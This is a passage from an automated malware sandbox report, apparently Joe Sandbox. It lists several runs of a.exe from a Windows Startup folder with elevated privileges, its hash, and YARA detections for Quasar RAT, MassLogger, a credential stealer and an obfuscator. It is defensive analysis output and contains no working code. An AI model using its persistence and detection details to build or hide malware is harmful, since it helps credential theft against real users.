                                                                                                                                                            • Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: 0000000B.00000002.775905725.0000000003969000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                            • Rule: JoeSecurity_BedsObfuscator, Description: Yara detected Beds Obfuscator, Source: 0000000B.00000002.775905725.0000000003969000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 0000000B.00000002.775905725.0000000003969000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000B.00000002.775905725.0000000003969000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: 0000000B.00000002.775433502.0000000003881000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                            • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 0000000B.00000002.775433502.0000000003881000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000B.00000002.775433502.0000000003881000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: JoeSecurity_BedsObfuscator, Description: Yara detected Beds Obfuscator, Source: 0000000B.00000002.789219576.0000000007530000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                            Reputation:low

                                                                                                                                                            General

                                                                                                                                                            Start time:20:35:31
                                                                                                                                                            Start date:22/02/2021
                                                                                                                                                            Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe
                                                                                                                                                            Imagebase:0x270000
                                                                                                                                                            File size:129536 bytes
                                                                                                                                                            MD5 hash:7D9D8812398EAF9AC0D85E728BBF8637
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:low

                                                                                                                                                            General

                                                                                                                                                            Start time:20:35:31
                                                                                                                                                            Start date:22/02/2021
                                                                                                                                                            Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe
                                                                                                                                                            Imagebase:0xa90000
                                                                                                                                                            File size:129536 bytes
                                                                                                                                                            MD5 hash:7D9D8812398EAF9AC0D85E728BBF8637
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:.Net C# or VB.NET
                                                                                                                                                            Yara matches:
                                                                                                                                                            • Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: 0000000D.00000002.947711194.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                                            • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 0000000D.00000002.947711194.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000D.00000002.947711194.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000D.00000002.952842213.0000000002DF1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000002.952842213.0000000002DF1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                            Reputation:low

                                                                                                                                                            General

                                                                                                                                                            Start time:20:35:48
                                                                                                                                                            Start date:22/02/2021
                                                                                                                                                            Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe'
                                                                                                                                                            Imagebase:0x5b0000
                                                                                                                                                            File size:129536 bytes
                                                                                                                                                            MD5 hash:7D9D8812398EAF9AC0D85E728BBF8637
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:.Net C# or VB.NET
                                                                                                                                                            Yara matches:
                                                                                                                                                            • Rule: JoeSecurity_BedsObfuscator, Description: Yara detected Beds Obfuscator, Source: 00000011.00000002.876240165.0000000007590000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: 00000011.00000002.853281517.00000000039A1000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                            • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000011.00000002.853281517.00000000039A1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000011.00000002.853281517.00000000039A1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: 00000011.00000002.858549049.0000000003C8C000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                            • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000011.00000002.858549049.0000000003C8C000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000011.00000002.858549049.0000000003C8C000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: 00000011.00000002.854642346.0000000003A89000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                            • Rule: JoeSecurity_BedsObfuscator, Description: Yara detected Beds Obfuscator, Source: 00000011.00000002.854642346.0000000003A89000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000011.00000002.854642346.0000000003A89000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000011.00000002.854642346.0000000003A89000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                            Reputation:low

                                                                                                                                                            General

                                                                                                                                                            Start time:20:36:03
                                                                                                                                                            Start date:22/02/2021
                                                                                                                                                            Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe
                                                                                                                                                            Imagebase:0xb20000
                                                                                                                                                            File size:129536 bytes
                                                                                                                                                            MD5 hash:7D9D8812398EAF9AC0D85E728BBF8637
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:.Net C# or VB.NET
                                                                                                                                                            Yara matches:
                                                                                                                                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000014.00000002.870308701.0000000002EE1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000002.870308701.0000000002EE1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: 00000014.00000002.866618994.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                                            • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000014.00000002.866618994.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000014.00000002.866618994.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                            Reputation:low

                                                                                                                                                            Disassembly

                                                                                                                                                            Code Analysis

                                                                                                                                                            Reset < >